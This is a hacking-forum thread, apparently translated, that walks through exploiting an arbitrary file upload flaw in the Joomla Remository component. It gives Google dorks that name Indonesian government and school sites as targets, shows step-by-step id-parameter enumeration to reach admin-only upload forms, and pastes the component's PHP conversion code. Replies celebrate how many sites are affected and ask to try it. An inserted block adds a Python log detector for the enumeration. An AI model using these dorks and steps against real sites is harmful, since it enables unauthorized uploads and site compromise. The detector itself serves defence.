.:: Blackc0de Forum ::.
 Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability

Z190T (Global Mod), Thu Apr 05, 2012 2:46 am

<< Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability
<< Author : Z190T
<< Contact : mahruz[dot]id[at]gmail[dot]com
<< Homepage : http://mahruz-id.com/
<< Vendor : http://remository.com/downloads/
<< d0rk :
- inurl:"func=addfile" <-- Organisation, School, Academic and Government of Indonesian Site
- inurl:"/func,addfile/" <-- Organisation, School, Academic and Government of Indonesian Site
- inurl:"index.php?option=com_remository" <-- free!!
<< File Allowed : Any File Extension
<< Try 0n : any OS
<< readme.

First of all, I just want to point out one important thing: the importance of being careful when choosing plugins or web components, whether for Joomla, WordPress, Drupal or anything else. It doesn't matter how good the website we build looks; a good look does not guarantee a website's security. What matters most is that our website looks simple and is backed by an above-average security system.

I am going to describe one of the many weaknesses in Joomla components, namely Repository. Repository here means the collection of download material or files that is made openly available to users, admins and even all visitors.

Remository is the changed name for Repository in Joomla. I don't know, I don't understand either why it has to be called Remository??

Whatever!!
Enough, you've been reading my rambling for too long!! Let's get straight to it...

<< For the d0rks [inurl:"func=addfile"] and [inurl:"index.php?option=com_remository"]
Example :
http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=15

“You have no permitted upload categories - please refer to the webmaster”

There we can see that we do not have permission to upload data with id 15 in section 46; only the Admin is allowed to upload data to that area. So... how do we manage to upload data to that area? "Ooo... it can't be done...!!" <-- only a fool would say that! We manipulate the data we send in!! Let's do it!!

Leave the Itemid part unchanged; the only thing we change is the id. Inject a little until the upload table comes out!! ^_^

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=1

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=2

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=3

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=4

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=5

and so on... until it spills out!! heheheheee….
If you get bored of injecting, just go straight to a high number, for example,

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=99

but, if for example we get it at..

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=8

just upload right away!! Don't forget to fill in the form, so that it is easy to find the directory of the uploaded file.

All Done!

Please Note: All Uploads will be reviewed prior to Publishing.

Yes!! We succeeded!!
Finding the uploaded file is, in my opinion, the somewhat difficult part, because the file we uploaded has already gone through the converter in ../remositoryAdminDbconvert.php
Its contents look like this..

Code:
<?php

    class remositoryAdminDbconvert extends remositoryAdminControllers {

        function remositoryAdminDbconvert ($admin) {
            remositoryAdminControllers::remositoryAdminControllers ($admin);
            $_REQUEST['act'] = 'dbconvert';
        }
       
        function listTask () {
            $view =& new remositoryAdminHTML ($this, 0, '');
            $view->formStart(_DOWN_ADMIN_ACT_DBCONVERT);
            $interface =& remositoryInterface::getInstance();
            $database =& $interface->getDB();
            foreach (array('containers','files','reviews','structure','log','temp') as $tablename) {
                $sql = "TRUNCATE TABLE #__downloads_$tablename";
                remositoryRepository::doSQL($sql);
            }
            $sql = "ALTER TABLE #__downloads_containers AUTO_INCREMENT=2";
            remositoryRepository::doSQL($sql);
            $containermap = array('catid'=>array(),'folderid'=>array());
            $sql = "SELECT * FROM #__downloads_category";
            $database->setQuery($sql);
            $rows = $database->loadObjectList();
            if (!$rows) $rows = array();
            foreach ($rows as $row) {
                if ($row->registered) $row->registered = '0';
                else $row->registered = '2';
                foreach ($row as $field=>$value) {
                    if (!is_numeric($row->$field)) $row->$field = $database->getEscaped($row->$field);
                }
                $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES (0,'$row->name',$row->published,'$row->description',$row->files,'$row->icon',$row->registered)";
                $database->setQuery($sql);
                if (!$database->query()) {
                    echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                    exit();
                }
                $newid = $database->insertid();
                $containermap['catid'][$row->id] = $newid;
                $sql = "SELECT * FROM #__downloads_folders WHERE catid=$row->id";
                $database->setQuery($sql);
                $folders = $database->loadObjectList();
                if ($folders) {
                    foreach ($folders as $folder) $this->convertfolder ($folder, $newid, $containermap);
                }
            }
            $sql = "SELECT * FROM #__downloads";
            $database->setQuery($sql);
            $files = $database->loadObjectList();
            if (!$files) $files = array();
            foreach ($files as $file) {
                $testurl = strtolower(trim($file->url));
                $findsite = strpos($testurl, strtolower(trim($interface->getCfg('live_site'))));
                if ($findsite===false){
                    $islocal = '0';
                    $realname = '';
                    $filedate = date('Y-m-d');
                    $url = $file->url;
                    if (eregi(_REMOSITORY_REGEXP_URL,$url) OR eregi(_REMOSITORY_REGEXP_IP,$url)) $filefound = true;
                    else $filefound = false;
                }
                else {
                    $islocal = '1';
                    $url_array=explode('/',$file->url);
                    $url = '';
                    $realname = $url_array[(count($url_array)-1)];
                    $filepath = $this->repository->Down_Path.'/'.$realname;
                    if (file_exists($filepath)) {
                        $filefound = true;
                        $filedate = date('Y-m-d', filemtime($this->repository->Down_Path.'/'.$realname));
                    }
                    else $filefound = false;
                }
                $containerid = 0;
                if ($file->catid != 0) {
                    if (isset($containermap['catid'][$file->catid])) $containerid = $containermap['catid'][$file->catid];
                    else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->catid.'</td></tr>';
                }
                if ($file->folderid != 0) {
                    if (isset($containermap['folderid'][$file->folderid])) $containerid = $containermap['folderid'][$file->folderid];
                    else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->folderid.'</td></tr>';
                }
                if ($filefound AND $containerid != 0) {
                    foreach (get_class_vars(get_class($file)) as $field=>$value) if (is_string($file->$field)) $file->$field = $database->getEscaped($file->$field);
                    $sql="INSERT INTO #__downloads_files (realname,islocal,containerid,published,url,description,smalldesc,autoshort,license,licenseagree,filetitle,filesize,filetype,downloads,icon,fileversion,fileauthor,filedate,filehomepage,screenurl,submittedby,submitdate) VALUES ('$realname',$islocal,$containerid,$file->published,'$url','$file->description','$file->smalldesc',$file->autoshort,'$file->license',$file->licenseagree,'$file->filename','$file->filesize','$file->filetype','$file->downloads','$file->icon','$file->fileversion','$file->fileauthor','$filedate','$file->filehomepage','$file->screenurl', $file->submittedby,'$file->submitdate')";
                    $database->setQuery($sql);
                    if (!$database->query()) {
                        echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                        exit();
                    }
                    $newid = $database->insertid();
                    $sql = "SELECT * FROM #__downloads_comments WHERE id=$file->id";
                    $database->setQuery($sql);
                    $comments = $database->loadObjectList();
                    if ($comments) {
                        foreach ($comments as $comment) {
                            $sql = "INSERT INTO #__downloads_reviews (component,itemid,userid,title,comment,date) VALUES ('com_remository',$newid,'$comment->userid','Review Title','$comment->comment','$comment->time')";
                            $database->setQuery($sql);
                            remositoryRepository::doSQL($sql);
                        }
                    }
                }
                else echo '<tr><td>'.$file->url.'</td></tr>';
            }
            $this->repository->resetCounts(array());
            echo '<tr><td class="message">'._DOWN_DB_CONVERT_OK.'</td></tr>';
            echo '</table></form>';
        }
     
        function convertfolder ($folder, $parent, &$containermap) {
            $interface =& remositoryInterface::getInstance();
            $database =& $interface->getDB();
            foreach ($folder as $field=>$value) {
                if (!is_numeric($folder->$field)) $folder->$field = $database->getEscaped($folder->$field);
            }
            if ($folder->registered) $folder->registered = '0';
            else $folder->registered = '2';
            $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES ($parent, '$folder->name', $folder->published, '$folder->description', '$folder->files', '$folder->icon', $folder->registered)";
            $database->setQuery($sql);
            if (!$database->query()) {
                echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                exit();
            }
            $newid = $database->insertid();
            $containermap['folderid'][$folder->id] = $newid;
            $sql = "SELECT * FROM #__downloads_folders WHERE parentid=$folder->id";
            $database->setQuery($sql);
            $children = $database->loadObjectList();
            if ($children) {
                // Recurse into child folders through the class method (as listTask does)
                foreach ($children as $child) $this->convertfolder ($child, $newid, $containermap);
            }
        }

    }

?>

Please work out what it does yourselves!! ^_^ heheheee....

<< For the d0rk [inurl:"/func,addfile/"]

Example :

http://localhost/index.php/downloads/func-addfile/
The way to inject is not much different, you just append /id/(number). For example..
http://localhost/index.php/downloads/func-addfile/id/99

<< result.
Okay... I think that's enough for now, see you later brother... ^_^
source : http://mahruz-id.com/id/2012/04/func-addfile/
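
From the defender's side, the behaviour described in the post above (one client stepping through id values on the func=addfile URL until an upload form is served) leaves a clear trail in the web server access log. The following is an added example, not part of the original post or of Remository's code: the log lines are constructed, and it assumes combined log format and that the upload itself is POSTed to the same addfile URL.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Apr/2012:02:50:01 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=15 HTTP/1.1" 200 5120
198.51.100.7 - - [05/Apr/2012:02:50:03 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=1 HTTP/1.1" 200 5120
198.51.100.7 - - [05/Apr/2012:02:50:04 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=2 HTTP/1.1" 200 5120
198.51.100.7 - - [05/Apr/2012:02:50:05 +0700] "GET /index.php/downloads/func-addfile/id/8 HTTP/1.1" 200 9340
198.51.100.7 - - [05/Apr/2012:02:51:10 +0700] "POST /index.php?option=com_remository&Itemid=46&func=addfile&id=8 HTTP/1.1" 200 2048
203.0.113.20 - - [05/Apr/2012:03:10:00 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=15 HTTP/1.1" 200 5120
203.0.113.20 - - [05/Apr/2012:03:10:09 +0700] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 8800
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) [^"]*" (\d{3}) ')
# SEF forms shown in the post: /func,addfile/ and /func-addfile/id/<n>
SEF_RE = re.compile(r'/func[-,]addfile(?:/id/(\d+))?')

def addfile_container(target):
    """Return (is_addfile_request, container_id_or_None) for a request target."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    if query.get("option") == ["com_remository"] and query.get("func") == ["addfile"]:
        ids = query.get("id", [])
        return True, int(ids[0]) if ids and ids[0].isdigit() else None
    match = SEF_RE.search(parts.path)
    if match:
        return True, int(match.group(1)) if match.group(1) else None
    return False, None

def find_enumeration(log_text, min_ids=4):
    """Report clients that requested the add-file form for >= min_ids distinct ids."""
    seen = defaultdict(lambda: {"ids": set(), "posts": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, _status = m.groups()
        is_addfile, container = addfile_container(target)
        if not is_addfile:
            continue
        if container is not None:
            seen[ip]["ids"].add(container)
        if method == "POST":  # assumption: upload submitted to the addfile URL
            seen[ip]["posts"] += 1
    return {ip: {"ids": sorted(v["ids"]), "posts": v["posts"]}
            for ip, v in seen.items() if len(v["ids"]) >= min_ids}
```

A client reported with a non-zero "posts" count is the one to follow up first: check the unpublished upload queue and the download directory for files submitted from that address.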

c4p1t4n (Global Mod), Thu Apr 05, 2012 2:09 pm

Permission to try this out...
Bro... this is brand new...

Babyhui (NuuBiiTooL), Fri Apr 06, 2012 6:10 pm

A new one, a new one

Z190T (Global Mod), Fri Apr 06, 2012 8:25 pm

Yep...!! That one is new, bro!! Its flaw was only discovered a few days ago!!

CyberWild (Moderator), Fri Apr 06, 2012 11:03 pm

Is the bug still fresh?

Black.exe (Global Mod), Fri Apr 06, 2012 11:45 pm

Whoa, a lot of sites are affected :bahak:

By the way, thanks bro :minta:

Z190T (Global Mod), Sat Apr 07, 2012 3:45 am

It's still completely untouched, bro..!! I haven't shared it on exploit-db yet!! I only found it yesterday, April 4!! "In my opinion"

BumiayuKita (Administrator), Fri Apr 13, 2012 7:09 pm

That looks almost the same as spaw, doesn't it, bro?

Z190T (Global Mod), Fri Apr 13, 2012 11:30 pm

It seems similar, bro... but this one is simpler, bro...!!

0day (Trainee), Sat Apr 14, 2012 9:03 am

Permission to try this out, bro mahruz :sukro:

exploi (Newbie - Hack), Mon Apr 16, 2012 12:21 pm

Permission to follow along, bro :belajar: :spy: